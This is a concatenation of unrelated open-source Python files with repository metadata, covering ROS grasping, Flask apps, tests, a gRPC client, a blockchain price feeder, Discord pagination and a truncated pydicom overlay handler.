self.cam_frame_id = rospy.get_param("~cam/frame_id")
self.cam_topic_name = rospy.get_param("~cam/topic_name")
self.intrinsic = CameraIntrinsic.from_dict(rospy.get_param("~cam/intrinsic"))
self.size = 6.0 * rospy.get_param("~finger_depth")
self.cv_bridge = cv_bridge.CvBridge()
self.tf_tree = ros_utils.TransformTree()
self.integrate = False
rospy.Subscriber(self.cam_topic_name, sensor_msgs.msg.Image, self.sensor_cb)
def reset(self):
self.low_res_tsdf = TSDFVolume(self.size, 40)
self.high_res_tsdf = TSDFVolume(self.size, 120)
def sensor_cb(self, msg):
if not self.integrate:
return
img = self.cv_bridge.imgmsg_to_cv2(msg).astype(np.float32) * 0.001
T_cam_task = self.tf_tree.lookup(
self.cam_frame_id, "task", msg.header.stamp, rospy.Duration(0.1)
)
self.low_res_tsdf.integrate(img, self.intrinsic, T_cam_task)
self.high_res_tsdf.integrate(img, self.intrinsic, T_cam_task)
def main(args):
rospy.init_node("panda_grasp")
panda_grasp = PandaGraspController(args)
while True:
panda_grasp.run()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--model", type=Path, required=True)
args = parser.parse_args()
main(args)
| 8,126 |
tests/fruits_vows.py
|
wking/pyvows
| 34 |
2170492
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pyvows testing engine
# https://github.com/heynemann/pyvows
# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 <NAME> <EMAIL>
from pyvows import Vows, expect
class Strawberry(object):
def __init__(self):
self.color = '#ff0000'
def isTasty(self):
return True
class PeeledBanana(object):
pass
class Banana(object):
def __init__(self):
self.color = '#fff333'
def peel(self):
return PeeledBanana()
@Vows.batch
class TheGoodThings(Vows.Context):
class AStrawberry(Vows.Context):
def topic(self):
return Strawberry()
def is_red(self, topic):
expect(topic.color).to_equal('#ff0000')
def and_tasty(self, topic):
expect(topic.isTasty()).to_be_true()
class ABanana(Vows.Context):
def topic(self):
return Banana()
class WhenPeeled(Vows.Context):
def topic(self, banana):
return banana.peel()
def returns_a_peeled_banana(self, topic):
expect(topic).to_be_instance_of(PeeledBanana)
| 1,192 |
testfiles/TTL test.py
|
Somnitec/thelastjobonearthbot
| 0 |
2172489
|
import win32com.client as wincl
speak = wincl.Dispatch("SAPI.SpVoice")
speak.Speak("This is the pc voice speaking")
| 116 |
main.py
|
jacksongolding/flask_portfolio
| 0 |
2171837
|
# hi my name is joe
# import "packages" from flask
from flask import Flask, request, render_template, url_for, redirect
from cruddy.app_crud import app_crud
from __init__ import app
from notey.app_notes import app_notes
from cruddy.model import Users, coolendar, model_printerr
from cruddy.query import users_all
from cruddy.eventroutes import events_all, app_events
app.register_blueprint(app_crud)
app.register_blueprint(app_notes)
app.register_blueprint(app_events)
# create a Flask instance
# connects default URL to render index.html
@app.route('/')
def index():
return render_template("index.html")
@app.route('/quiz/')
def quiz():
return render_template("quiz.html")
@app.route('/quiz3/')
def quiz3():
return render_template("quiz3.html")
@app.route('/quiz4/')
def quiz4():
return render_template("quiz4.html")
@app.route('/quizhome/')
def quizhome():
return render_template("quizhome.html")
@app.route('/Results/')
def Results():
return render_template("Results.html")
@app.route('/Squid/')
def Squid():
return render_template("Squid.html")
@app.route('/Building/')
def Building():
return render_template("Building.html")
@app.route('/overview/')
def overview():
return render_template("overview.html")
@app.route('/study/')
def study():
return render_template("study.html")
@app.route('/test/')
def test():
return render_template("test.html")
@app.route('/importantevents/')
def importantevents():
table = events_all()
return render_template("importantevents.html", table=table)
@app.route('/LUCAS', methods=['GET', 'POST'])
def LUCAS():
# submit button has been pushed
if request.form:
name = request.form.get("name")
if len(name) != 0: # input field has content
return render_template("Lucas.html", name=name)
# starting and empty input default
return render_template("Lucas.html", name="World")
@app.route('/RITHWIKH', methods=['GET', 'POST'])
def RITHWIKH():
# submit button has been pushed
if request.form:
name = request.form.get("name")
if len(name) != 0: # input field has content
return render_template("Rithwikh.html", name=name)
# starting and empty input default
return render_template("Rithwikh.html", name="World")
@app.route('/flashcards/')
def flashcards():
return render_template("flashcards.html")
# runs the application on the development server
if __name__ == "__main__":
app.run(debug=True)
| 2,503 |
tests/test_etherscan.py
|
VolumeFi/somm_airdrop
| 0 |
2170679
|
#!/usr/bin/env python
# import __init__
import os
import json
import pytest
from somm_airdrop import etherscan
from typing import Any, Dict, List, Union
from somm_airdrop.etherscan.token_info_connector import TokenInfoMap, TokenID
class TestTokenInfoConnector:
@pytest.fixture
def connector(self) -> etherscan.TokenInfoConnector:
return etherscan.TokenInfoConnector()
def test_single_query(self, connector: etherscan.TokenInfoConnector):
token_id = "0x0e3a2a1f2146d86a604adc220b4967a898d7fe07"
token_info_map: TokenInfoMap = connector.get_token_info(
token_ids=token_id)
assert isinstance(token_info_map, dict)
assert all([isinstance(token_id, TokenID) for token_id in token_info_map])
@pytest.fixture
def token_info_map(self, connector: etherscan.TokenInfoConnector
) -> TokenInfoMap:
token_id_wbtc: str = "0x2260fac5e5542a773aa44fbcfedf7c193bc2c599"
token_id_card: str = "0x0e3a2a1f2146d86a604adc220b4967a898d7fe07"
token_ids: List[str] = [token_id_wbtc, token_id_card]
token_info_map: TokenInfoMap = connector.get_token_info(
token_ids=token_ids)
assert isinstance(token_info_map, dict)
assert all([isinstance(token_id, TokenID) for token_id in token_info_map])
return token_info_map
def test_save_token_info_json(self,
connector: etherscan.TokenInfoConnector,
token_info_map: TokenInfoMap):
""""""
connector.save_token_info_json(token_info_map=token_info_map)
with open(os.path.join("data", "token_info.json"), mode='r') as f:
map_from_file: TokenInfoMap = json.load(f)
for token_id in token_info_map:
assert token_id in map_from_file, (
f"Failed to save token id: {token_id}")
class TestEtherscanConnector:
@pytest.fixture
def connector(self) -> etherscan.EtherscanConnector:
return etherscan.EtherscanConnector()
def test_get_tx_receipt(self, connector: etherscan.EtherscanConnector):
tx_hash: str = "0x20f98d428f3452a858ddb0972628991f50c529fbc5883111d1db1e6ba2eb4121"
tx_receipt: Dict[str, Any] = connector.get_tx_receipt(tx_hash=tx_hash)
assert isinstance(tx_receipt, dict)
assert all([isinstance(key, str) for key in tx_receipt])
| 2,435 |
modules/get_gps.py
|
zrschell/weatheringwithus
| 1 |
2171178
|
import subprocess
def get_gps_data():
p = subprocess.Popen('timeout 1s grep -qsRw -m 1 "/\$GPGGA/" /dev/serial0', shell=True, stdout=subprocess.PIPE)
out, err = p.communicate()
gps_data = str(out.decode("utf-8")).split(",")
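    # In a $GPGGA sentence, field 2 holds latitude (ddmm.mmmm) and field 4 holds longitude (dddmm.mmmm)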
try:
latitude = gps_data[2]
latitude_split = latitude.split(".")
latitude = latitude_split[0][0:-2] + "." + latitude_split[1]
if latitude_split[0][0] == "0":
latitude = "-" + latitude
longitude = gps_data[4]
longitude_split = longitude.split(".")
longitude = longitude_split[0][0:-2]+ "." + longitude_split[1]
if longitude_split[0][0] == "0":
longitude = "-" + longitude
latitude = float(latitude)
longitude = float(longitude)
data = {"latitude": latitude, "longitude": longitude}
return data
except:
print("gps not detected")
return False
if __name__ == "__main__":
data = get_gps_data()
print(data)
| 1,052 |
var/spack/repos/builtin/packages/r-islr/package.py
|
jeanbez/spack
| 0 |
2171532
|
# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack.package import *
class RIslr(RPackage):
"""Data for an Introduction to Statistical Learning with Applications in R.
We provide the collection of data-sets used in the book 'An Introduction to
Statistical Learning with Applications in R'."""
cran = "ISLR"
version('1.4', sha256='7151c636808198ee759cbcf22f82a7aa76580fb8d11e4cd67f69f85401c820c3')
version('1.2', sha256='b00f7a06d2fb646917e629cc2dbdab71c7de3eb17a8a4d06849901a299f1caad')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'), when='@1.4:')
| 787 |
home_budgeting_app/expenditure/forms.py
|
TobKed/Home-Budgeting-App
| 0 |
2172521
|
from datetime import datetime
from flask_login import current_user
from flask_wtf import Form
from wtforms import DateTimeField, DecimalField, SelectField, StringField, SubmitField
from wtforms.validators import DataRequired
from home_budgeting_app.expenditure.models import Category
class ExpenditureForm(Form):
value = DecimalField("Value", places=2, validators=[DataRequired()])
spent_at = DateTimeField("Spent at", format="%Y-%m-%dT%H:%M", validators=[])
comment = StringField("Comment")
category = SelectField("Category", coerce=int, validators=[DataRequired()])
submit = SubmitField("Save")
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if not self.spent_at.data:
self.spent_at.data = datetime.today().replace(microsecond=0, second=0)
if current_user.is_authenticated:
categories = (
Category.query.filter(Category.user_id == current_user.id)
.order_by(Category.expenditures_count.desc())
.all()
)
choices = [(cat.id, "-".join(cat.path)) for cat in categories]
self.category.choices = choices
| 1,186 |
jenkins/generate.py
|
shengxinhu/tvm
| 4,640 |
2169855
|
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import jinja2
import argparse
import difflib
import re
import datetime
import textwrap
from pathlib import Path
REPO_ROOT = Path(__file__).resolve().parent.parent
JENKINSFILE_TEMPLATE = REPO_ROOT / "jenkins" / "Jenkinsfile.j2"
JENKINSFILE = REPO_ROOT / "Jenkinsfile"
data = {
"images": [
{
"name": "ci_arm",
"platform": "ARM",
},
{
"name": "ci_cpu",
"platform": "CPU",
},
{
"name": "ci_gpu",
"platform": "CPU",
},
{
"name": "ci_hexagon",
"platform": "CPU",
},
{
"name": "ci_i386",
"platform": "CPU",
},
{
"name": "ci_lint",
"platform": "CPU",
},
{
"name": "ci_qemu",
"platform": "CPU",
},
{
"name": "ci_wasm",
"platform": "CPU",
},
]
}
def lines_without_generated_tag(content):
return [
line for line in content.splitlines(keepends=True) if not line.startswith("// Generated at")
]
if __name__ == "__main__":
help = "Regenerate Jenkinsfile from template"
parser = argparse.ArgumentParser(description=help)
parser.add_argument("--check", action="store_true", help="just verify the output didn't change")
args = parser.parse_args()
with open(JENKINSFILE) as f:
content = f.read()
data["generated_time"] = datetime.datetime.now().isoformat()
environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(REPO_ROOT),
undefined=jinja2.StrictUndefined,
lstrip_blocks=True,
trim_blocks=True,
keep_trailing_newline=True,
)
template = environment.get_template(str(JENKINSFILE_TEMPLATE.relative_to(REPO_ROOT)))
new_content = template.render(**data)
diff = "".join(
difflib.unified_diff(
lines_without_generated_tag(content), lines_without_generated_tag(new_content)
)
)
if args.check:
if not diff:
print("Success, the newly generated Jenkinsfile matched the one on disk")
exit(0)
else:
print(
textwrap.dedent(
"""
Newly generated Jenkinsfile did not match the one on disk! If you have made
edits to the Jenkinsfile, move them to 'jenkins/Jenkinsfile.j2' and
regenerate the Jenkinsfile from the template with
python3 -m pip install -r jenkins/requirements.txt
python3 jenkins/generate.py
Diffed changes:
"""
).strip()
)
print(diff)
exit(1)
else:
with open(JENKINSFILE, "w") as f:
f.write(new_content)
if not diff:
print(f"Wrote output to {JENKINSFILE.relative_to(REPO_ROOT)}, no changes made")
else:
print(f"Wrote output to {JENKINSFILE.relative_to(REPO_ROOT)}, changes:")
print(diff)
| 3,936 |
data/plots/src/plt_bar_diffuse.py
|
lovaulonze/paper.gr_nanopore
| 0 |
2172629
|
import numpy
import matplotlib.pyplot as plt
salts = ["KCl", "NaCl", "LiCl", "CaCl2", "MgSO4", "K2SO4", "KFeCN"]
data = numpy.genfromtxt("../data/diffuse-pcte-salt.csv",
delimiter=",",
skip_header=2)
plt.figure(figsize=(3, 3 * 0.8))
plt.style.use("science")
# for i in range(len(salts)):
# name = salts[i]
# Measured
data = data / 1e-6
print(data.shape)
x = numpy.arange(len(salts))
w = 1.0 /6
#bare pcte measure
plt.bar(x - w * 3 / 2 , data[:, 6], width=w,
yerr=data[:, 7], color="blue",
label="raw")
# Simulate
plt.bar(x - w / 2, data[:, 3], width=w, color="red",
yerr=data[:, 5 : 3 : -1].T,
label="simu")
# Bare
plt.bar(x + 1 / 2 * w, data[:, 1], width=w,
yerr=data[:, 2], color="green",
label="gr")
#
# plt.plot(data[:, 1] / 3600, data[:, 2] / 1e-3)
# plt.xlabel("t (h)")
# plt.ylabel("Conductivity")
plt.xticks(range(0, 7))
plt.xlim(-0.5, 6.5)
plt.legend()
plt.savefig("../img/diffusion-salts.svg")
| 1,023 |
python/1002.py
|
felipesud/beecrowd
| 0 |
2173159
|
# The formula to calculate the area of a circle is defined as A = π · R². Consider for this problem that π = 3.14159:
# Calculate the area using the formula given in the problem description.
# Input
# The input contains a floating-point value (double precision), which is the variable R.
# Output
# Print the message "A=" followed by the value of the variable, as in the example below, with four places after the decimal point. Use double precision for all variables. As in all problems, don't forget to print the end of line after the result, otherwise you will receive "Presentation Error".
R = float(input())
R = R*R*3.14159
print("A=%.4f" % R)
| 666 |
base/feeder.py
|
AssetFun/feedprice
| 0 |
2172223
|
#coding=utf-8
import json
import time
import math
import demjson
from grapheneapi import grapheneapi
import log
import price_assetfun_get_price
import threading
import re
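# Feeder connects to the wallet RPC and periodically feeds coin prices to the chain, refeeding any prices that were marked invalid.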
class Feeder(object):
def __init__(self, self_config_file):
self_config=[]
self.feeded_invalid_price=[] #[2018-1-15 lilianwen add]
with open(self_config_file,"r",encoding='utf-8') as cf:
self_config = json.load(cf)
print(self_config)
self._host = self_config["host"]
self._port = self_config["port"]
self._login_account = self_config["login_account"]
self._password = self_config["password"]
self._time_offset = self_config["time_offset"]
self._interval = self_config["interval"]
self._logger = log.LogInit(self_config["log_file"], when="D", log_name="feed_price")
self._feed_func_config = self_config["feed_price"]
print(self._feed_func_config)
if len(self_config["witnesses"]) == 0:
config_file = self_config["witness_config_file"]
print(config_file)
self._witnesses = self.get_witness_ids( config_file )
else:
self._witnesses = self_config["witnesses"]
def connect(self, host, port, login_account, passwd):
self._rpc_ro = grapheneapi.GrapheneAPI(host, port, "", "")
self._rpc_feed = grapheneapi.GrapheneAPI(host, port, login_account, passwd)
ret = self._rpc_feed.is_locked()
if ret:
self._rpc_feed.unlock(passwd)
    # Determine the witness list from the config file
def get_witness_ids(self, config_file):
witness_ids=[]
with open(config_file,"r") as f:
            lines = f.readlines()  # read the whole file
for line in lines:
if line.find("witness-id") != -1 and line.find("#") == -1:
pattern = re.compile('"(.*)"')
witness_ids.append(pattern.findall(line)[0])
return witness_ids
def feed_coin(self):
print("======================================feed one time==============================")
dyn_prop = self._rpc_ro.get_dynamic_global_properties()
print(dyn_prop["current_witness"])
print(self._witnesses)
self._feed_account = self._rpc_ro.get_witness(dyn_prop["current_witness"])["witness_account"]
if dyn_prop["current_witness"] in self._witnesses:
for one_index in self._feed_records:
if one_index[0] == "1":#只喂数字货币
for one_platform in self._feed_records[one_index]:
for one_trade_pair in self._feed_records[one_index][one_platform]:
self.feed(one_index, one_platform, one_trade_pair)
        # timestamps of invalid coin prices that were fed previously
give_up=[]
if self.feeded_invalid_price:
for one in self.feeded_invalid_price:
self._logger.info("Reset coin price")
uint_time=int(time.time())
                if uint_time - one[3] < 300 and uint_time - one[3]>120:  # has it been more than 5 minutes? after five minutes the price site no longer updates the price
index = one[0]
quote_base = one[2]
platform = one[1]
uint_time = one[3]
quote = quote_base.split("/")[0]
base = quote_base.split("/")[1]
price = self._rpc_ro.get_coin_price(index, quote_base, str(uint_time))
if price["price"] == -100000000:#读区块链上该价格是否为非法喂价
get_feed_func = self._feed_records[index][platform][quote_base]
prices = get_feed_func(quote,base,platform,uint_time,uint_time)
self._logger.info("[Refeed invalid price]GetPrices(%s:%s):%s" %(platform,quote_base,str(prices)))
try:
self._rpc_feed.reset_coin_price(self._feed_account,index,quote_base,prices,True)
self._logger.info("[Refeed invalid price success.")
except Exception as err:
self._logger.error(err)
else:
self._logger.info("Price on blockchain is %s,so not reset it." %(str(price["price"])))
give_up.append(one)
else:
self._logger.info("Current reset coin price time is not valid(%s,not in[5,300])." %(uint_time - one[3]))
give_up.append(one)
if give_up:
for one in give_up:
self.feeded_invalid_price.remove(one)
uint_time=int(time.time())
if uint_time%10==0:
_timer = threading.Timer(self._interval, self.feed_coin)
_timer.start()
else:
_timer = threading.Timer(self._interval-(uint_time%10), self.feed_coin)
_timer.start()
def feed(self, index, platform, quote_base):
quote=quote_base.split("/")[0]
base=quote_base.split("/")[1]
uint_time=int(time.time())
uint_time=int((uint_time-self._time_offset)/60)*60
get_feed_func = self._feed_records[index][platform][quote_base]
prices = get_feed_func(quote,base,platform,uint_time,uint_time)
print("result get prices,before feed price:")
print(prices)
one_invalid_price=[]
for one in prices:
if one[1] == -100000000:
one_invalid_price.append(index)
one_invalid_price.append(platform)
one_invalid_price.append(quote_base)
one_invalid_price.append(one[0])
self.feeded_invalid_price.append(one_invalid_price)
self._logger.info("put one invalid price case in list")
self._logger.info("[Feed]GetPrices(%s:%s_%s):%s" %(platform,quote,base,str(prices)))
try:
ret=self._rpc_feed.feed_coin_price(self._feed_account,index,quote_base,prices,True)
print(ret)
print("feed price success.")
except Exception as err:
err = str(err)
npos=err.find("Feed coin price time not continuous")
if npos != -1:
start=err.index("{start:")+len("{start:")
end=err.index(", end:now}")
start_timestamp=int(err[start:end])
end_timestamp=int((time.time()-self._time_offset)/60)*60
                if end_timestamp < start_timestamp:  # [lilianwen add 2018-1-15: fix the case where the start timestamp exceeds the end timestamp]
                    self._logger.error("start timestamp(%d) is larger than end timestamp(%d). Maybe time offset(%d) is too large" % (start_timestamp, end_timestamp, self._time_offset))
end_timestamp=int((time.time()-60)/60)*60
prices = get_feed_func(quote,base,platform,start_timestamp,end_timestamp)
print("result get prices,before refeed price:")
print(prices)
self._logger.info("[Refeed]GetPrices(%s:%s_%s):%s" %(platform,quote,base,str(prices)))
self.refeed(index, platform, quote_base, prices)
else:
self._logger.error(err)
def refeed(self,index, platform, quote_base, prices):
try:
ret=self._rpc_feed.feed_coin_price(self._feed_account,index,quote_base,prices,True)
print(ret)
print("refeed price success.")
except Exception as err:
self._logger.exception(err)
    # Parse the feed-price configuration stored on the blockchain and return it in a reorganized form
def analyze_blockchain_config(self, strJson):
result={}
for one in strJson["module_cfg"]:
platform=strJson["module_cfg"][one]["platform_en"]
platform_trade_pair={}
quote_bases=[]
for one_trade_pair in strJson["module_cfg"][one]["quote_bases"]:
if strJson["module_cfg"][one]["quote_bases"][one_trade_pair] == "1":
quote_bases.append(one_trade_pair)
platform_trade_pair[platform]=quote_bases
result[one]=platform_trade_pair
return result
    # Register the price-feed functions
def register_feed_price_func(self, blockCfg, feedFuncCfg):
result={}
for platform in feedFuncCfg:
result_no_index={}
for index in blockCfg:
if platform in blockCfg[index]:
quote_base_func={}
for quote_base in feedFuncCfg[platform]:
if quote_base in blockCfg[index][platform]:
quote_base_func[quote_base] = eval(feedFuncCfg[platform][quote_base])
result_no_index[platform]=quote_base_func
result[index] = result_no_index
return result
def start(self):
self.connect(self._host, self._port, self._login_account, self._password)
blokchain_cfg = self._rpc_ro.get_module_cfg("COIN")
blokchain_cfg = self.analyze_blockchain_config(blokchain_cfg)
self._feed_records = self.register_feed_price_func(blokchain_cfg,self._feed_func_config)
_timer = threading.Timer(self._interval, self.feed_coin)
_timer.start()
    # iterate over gold price feeds
    # iterate over stock price feeds
| 9,711 |
functions/custom_pages.py
|
rageyboiii/test-boy
| 0 |
2173104
|
import asyncio
import nextcord as discord
from nextcord.ext import commands
from nextcord.ext.menus import MenuPages
from . import views
class Menu(MenuPages):
def __init__(self, source, extra_items=[], **kwargs):
self.extra_items = extra_items
self.button_ids = ["help-first", "help-back", "help-next", "help-last", "help-stop"]
self.interaction = None
super().__init__(source, **kwargs)
class PaginationButtons(discord.ui.View):
def __init__(self, *, extra=[], first_disabled=False, back_disabled=False, next_disabled=False, last_disabled=False, stop_disabled=False):
self.first_disabled, self.back_disabled, self.next_disabled, self.last_disabled, self.stop_disabled, = first_disabled, back_disabled, next_disabled, last_disabled, stop_disabled
super().__init__()
for item in extra:
self.add_item(item)
self.add_item(discord.ui.Button(emoji="⏮", disabled=first_disabled, style=discord.ButtonStyle.primary, custom_id="help-first"))
self.add_item(discord.ui.Button(emoji="◀", disabled=back_disabled, style=discord.ButtonStyle.primary, custom_id="help-back"))
self.add_item(discord.ui.Button(emoji="▶", disabled=next_disabled, style=discord.ButtonStyle.primary, custom_id="help-next"))
self.add_item(discord.ui.Button(emoji="⏭", disabled=last_disabled, style=discord.ButtonStyle.primary, custom_id="help-last"))
self.add_item(discord.ui.Button(emoji="⛔", disabled=stop_disabled, style=discord.ButtonStyle.danger, custom_id="help-stop"))
async def send_initial_message(self, ctx: commands.Context, channel: discord.TextChannel):
page = await self._source.get_page(0)
kwargs = await self._get_kwargs_from_page(page)
view = self.PaginationButtons(extra=views.Links().links, first_disabled=True, back_disabled=True)
return await ctx.send(**kwargs, view=view)
def component_check(self, payload: discord.Interaction) -> bool:
if payload.message.id != self.message.id:
return False
if payload.user.id not in {self.bot.owner_id, self._author_id, *self.bot.owner_ids}:
return False
return payload.data["custom_id"] in self.button_ids
async def _internal_loop(self):
try:
self.__timed_out = False
loop = self.bot.loop
tasks = []
while self._running:
interaction = await self.bot.wait_for("interaction", check=self.component_check, timeout=self.timeout)
loop.create_task(self.update(interaction))
except asyncio.TimeoutError:
self.__timed_out = True
finally:
# self.__event.set()
for task in tasks:
task.cancel()
try:
await self.finalize(self.__timed_out)
except Exception:
pass
finally:
self.__timed_out = False
if self.bot.is_closed():
return
try:
if self.delete_message_after:
return await self.message.delete()
if self.clear_reactions_after:
if self._can_remove_reactions:
return await self.message.edit(view=views.Links())
except Exception:
pass
async def update(self, payload: discord.Interaction):
if not self._running:
return
try:
await self.on_component(payload)
except Exception as exc:
self.bot.logger.exception(exc)
# await self.on_menu_button_error(exc)
async def show_page(self, page_number):
page = await self._source.get_page(page_number)
self.current_page = page_number
kwargs = await self._get_kwargs_from_page(page)
if page_number == 0:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links, first_disabled=True, back_disabled=True))
elif page_number == self._source.get_max_pages() - 1:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links, last_disabled=True, next_disabled=True))
else:
kwargs.update(view=self.PaginationButtons(extra=views.Links().links))
if self.interaction:
await self.interaction.edit_original_message(**kwargs)
else:
await self.message.edit(**kwargs)
async def on_component(self, ctx: discord.Interaction):
if not self.interaction:
await ctx.response.defer()
if ctx.data["custom_id"] == "help-first":
await self.show_page(0)
elif ctx.data["custom_id"] == "help-back":
await self.show_checked_page(self.current_page - 1)
elif ctx.data["custom_id"] == "help-next":
await self.show_checked_page(self.current_page + 1)
elif ctx.data["custom_id"] == "help-last":
await self.show_page(self._source.get_max_pages() - 1)
elif ctx.data["custom_id"] == "help-stop":
self.stop()
if not self.interaction:
self.interaction = ctx
async def start(self, ctx: commands.Context, *, channel: discord.TextChannel = None, wait: bool = False):
try:
del self.buttons
except AttributeError:
pass
self.bot = bot = ctx.bot
self.ctx = ctx
self._author_id = ctx.author.id
channel = channel or ctx.channel
is_guild = isinstance(channel, discord.abc.GuildChannel)
me = channel.guild.me if is_guild else ctx.bot.user
permissions = channel.permissions_for(me)
self.__me = discord.Object(id=me.id)
self._verify_permissions(ctx, channel, permissions)
self._event.clear()
msg = self.message
if msg is None:
self.message = msg = await self.send_initial_message(ctx, channel)
if self.should_add_reactions():
for task in self.__tasks:
task.cancel()
self.__tasks.clear()
self._running = True
self.__tasks.append(bot.loop.create_task(self._internal_loop()))
if wait:
await self._event.wait()
def stop(self):
self._running = False
for task in self.__tasks:
task.cancel()
self.__tasks.clear()
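# Minimal usage sketch (assumed names: ListPageSource comes from nextcord.ext.menus,
# while EmbedSource and the data variable are hypothetical, not part of this file):
#
#   from nextcord.ext import menus
#
#   class EmbedSource(menus.ListPageSource):
#       def __init__(self, entries):
#           super().__init__(entries, per_page=5)
#
#       async def format_page(self, menu, page):
#           return discord.Embed(description="\n".join(page))
#
#   # inside a command:
#   #   pages = Menu(EmbedSource(data), delete_message_after=False)
#   #   await pages.start(ctx)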
| 5,775 |
liste.py
|
beboy01/nan-project
| 0 |
2171788
|
######################## Exercise 1 ############################
"""In this exercise you must retrieve the different pieces
of the list using slices.
The starting list is the following:
liste = ["Maxime", "Martine", "Christopher", "Carlos", "Michael", "Eric"]
The goal of this exercise is to retrieve, with slices:
-- the first three employees ('Maxime', 'Martine', 'Christopher') in a list trois_premiers
-- the last three employees ('Carlos', 'Michael' and 'Eric') in a list trois_derniers
-- every employee except the first and the last in a list milieu
-- the first and the last employee in a list premier_dernier
"""
liste = ["Maxime", "Martine", "Christopher", "Carlos", "Michael", "Eric"]
trois_premiers = liste[0:3]
trois_derniers = liste[3:]
milieu = liste[1:-1]
premier_dernier = liste[0::5]
print(trois_premiers, trois_derniers, milieu, premier_dernier)
print("############### End of exercise 1 #################")
################################ Exercise 2 #######################################
"""
In this exercise you must add the number 6 to the list,
then check that the element was actually added.
The starting list is:
liste = [1, 2, 3, 4, 5]. You must add the number 6 to the list.
Then check whether the number 6 is present in the list; if it is,
display the string "The number 6 was added to the list."
"""
liste2 = [1, 2, 3, 4, 5]
i = 6
liste2.append(i)
if i in liste2:
    print(f"The number {i} was added to the list")
else:
    print(f"Error adding the number {i}")
############################# Exercise 3 ##########################################
"""
Retrieving elements from nested lists.
In this exercise you must retrieve information from inside two nested lists.
The script has two lists containing several nested lists: a list langages and a list nombres.
You must retrieve, in the variables python, deux and sept, respectively the string 'Python'
contained in the langages list and the numbers 2 and 7 contained in the nombres list.
You do not need to display the variables with print;
it is enough to retrieve the right values into the variables from
the lists using the element indices.
"""
print(" ############################# Exercise 3 ########################################## ")
langages = [["Python", "C++"], "Java"]
nombres = [1, [4, [2, 3]], 5, [6], [[7]]]
python = langages[0][0]
deux = nombres[1][1][0]
sept = nombres[4][0][0]
| 2,863 |
examples/input_example/main.py
|
iranathan/RobloxPy
| 1 |
2171984
|
import robloxpy
id = input("Please type an Asset ID: ")
print("Sales: "+ robloxpy.Asset.sales(id))
print("Price in tickets: "+ robloxpy.Asset.price_in_tickets(id))
print("Price in robux: "+ robloxpy.Asset.price_in_robux(id))
print("Creator: " + robloxpy.Asset.creator(id))
| 273 |
fortune/fortune_client.py
|
meffie/grpc-demos
| 0 |
2172138
|
import argparse
import logging
import sys
import grpc
import fortune_pb2
import fortune_pb2_grpc
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--host', help='fortune host', default='localhost')
parser.add_argument('--port', type=int, help='port number', default='50050')
parser.add_argument('-c', '--category', help='fortune category')
parser.add_argument('-l', '--list-categories', action='store_true', help='list fortune categories')
args = parser.parse_args()
logging.basicConfig()
addr = '{0}:{1}'.format(args.host, args.port)
with grpc.insecure_channel(addr) as channel:
stub = fortune_pb2_grpc.FortuneStub(channel)
if args.list_categories:
try:
response = stub.ListCategories(fortune_pb2.Empty())
print('\n'.join(response.categories))
except grpc.RpcError as e:
print('rpc error')
print('details:', e.details())
print('code:', e.code())
else:
try:
request = fortune_pb2.CookieRequest(category=args.category)
response = stub.GetCookie(request)
print(response.cookie)
except grpc.RpcError as e:
print('rpc error')
print('details:', e.details())
print('code:', e.code())
if __name__ == '__main__':
sys.exit(main())
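# Example invocations (assuming a fortune server is listening on localhost:50050;
# category names depend on the server's fortune database):
#   python fortune_client.py --list-categories
#   python fortune_client.py -c riddles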
| 1,496 |
BatchLabelMap/automatic/pydicom/overlays/numpy_handler.py
|
weras2/BatchLabelMap
| 0 |
2172821
|
# Copyright 2008-2019 pydicom authors. See LICENSE file for details.
"""Use the `numpy <https://numpy.org/>`_ package to convert supported *Overlay
Data* to a :class:`numpy.ndarray`.
**Supported data**
The numpy handler supports the conversion of data in the (60xx,3000)
*Overlay Data* element to a :class:`~numpy.ndarray` provided the
related :dcm:`Overlay Plane<part03/sect_C.9.2.html>` and :dcm:`Multi-frame
Overlay<part03/sect_C.9.3.html>` module elements have values given in the
table below.
+------------------------------------------------+--------------+
| Element | Supported |
+-------------+---------------------------+------+ values |
| Tag | Keyword | Type | |
+=============+===========================+======+==============+
| (60xx,0010) | OverlayRows | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0011) | OverlayColumns | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0015) | NumberOfFramesInOverlay | 1 | N > 0 |
+-------------+---------------------------+------+--------------+
| (60xx,0100) | OverlayBitsAllocated | 1 | 1 |
+-------------+---------------------------+------+--------------+
| (60xx,0102) | OverlayBitPosition | 1 | 0 |
+-------------+---------------------------+------+--------------+
"""
from typing import TYPE_CHECKING, cast, Dict, Any, Optional
import warnings
try:
import numpy as np
HAVE_NP = True
except ImportError:
HAVE_NP = False
from pydicom.pixel_data_handlers.numpy_handler import unpack_bits
if TYPE_CHECKING: # pragma: no cover
from pydicom.dataset import Dataset
from pydicom.dataelem import DataElement
HANDLER_NAME = 'Numpy Overlay'
DEPENDENCIES = {'numpy': ('http://www.numpy.org/', 'NumPy')}
def is_available() -> bool:
"""Return ``True`` if the handler has its dependencies met.
.. versionadded:: 1.4
"""
return HAVE_NP
def get_expected_length(elem: Dict[str, Any], unit: str = 'bytes') -> int:
"""Return the expected length (in terms of bytes or pixels) of the *Overlay
Data*.
.. versionadded:: 1.4
+------------------------------------------------+-------------+
